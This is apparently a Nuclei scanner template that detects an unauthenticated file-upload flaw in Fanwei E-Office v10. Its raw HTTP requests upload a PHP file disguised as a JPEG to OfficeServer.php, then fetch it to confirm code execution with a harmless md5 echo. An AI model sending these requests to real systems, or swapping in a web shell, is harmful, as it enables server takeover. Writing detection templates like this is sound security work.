id: fanwei-e-office-v10-fileupload

info:
  name: Fanwei E-Office v10 fileupload Detect
  author: soapffz
  severity: critical
  description: fanwei e-ffoice v10 version file upload
  reference:
    - https://github.com/Phuong39/2022-HW-POC/blob/main/%E6%B3%9B%E5%BE%AE%20EOffice10%20%E5%89%8D%E5%8F%B0%20GETSHELL.md
  tags: fanwei,fileupload,getshell

requests:
  - raw:
      - |
        POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 382
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjBiFKq46T8PfCB9o
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
        Connection: close

        ------WebKitFormBoundaryjBiFKq46T8PfCB9o
        Content-Disposition: form-data; name="FileData"; filename="1.jpg"
        Content-Type: image/jpeg

        <?php echo md5(1);?>
        ------WebKitFormBoundaryjBiFKq46T8PfCB9o
        Content-Disposition: form-data; name="FormData"

        {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'soaptest.php'}
        ------WebKitFormBoundaryjBiFKq46T8PfCB9o--

      - |
        GET /eoffice10/server/public/iWebOffice2015/Document/soaptest.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: word
        words:
         - "c4ca4238a0b923820dcc509a6f75849b"
        part: body_2